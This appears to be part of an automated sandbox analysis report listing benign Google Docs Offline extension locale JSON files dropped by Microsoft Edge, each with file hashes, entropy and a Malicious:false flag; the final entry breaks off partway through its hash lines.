                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                                  MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                                  SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                                  SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                                  SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1031
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                                  MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                                  SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                                  SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                                  SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1613
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                                  MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                                  SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                                  SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                                  SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):851
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                                  MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                                  SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                                  SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                                  SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):848
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                                                  MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                                                  SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                                                  SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                                                  SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1425
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                                                  MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                                                  SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                                                  SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                                                  SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):961
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                                                  MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                                                  SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                                                  SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                                                  SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):959
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                                                  MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                                                  SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                                                  SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                                                  SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):968
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                                                  MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                                                  SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                                                  SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                                                  SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):838
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                                                  MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                                                  SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                                                  SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                                                  SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):1305
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                                  MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                                  SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                                  SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                                  SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):911
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                                  MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                                  SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                                  SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                                  SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):939
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                                  MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                                  SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                                                  SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                                                  SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                  MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                  SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                  SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
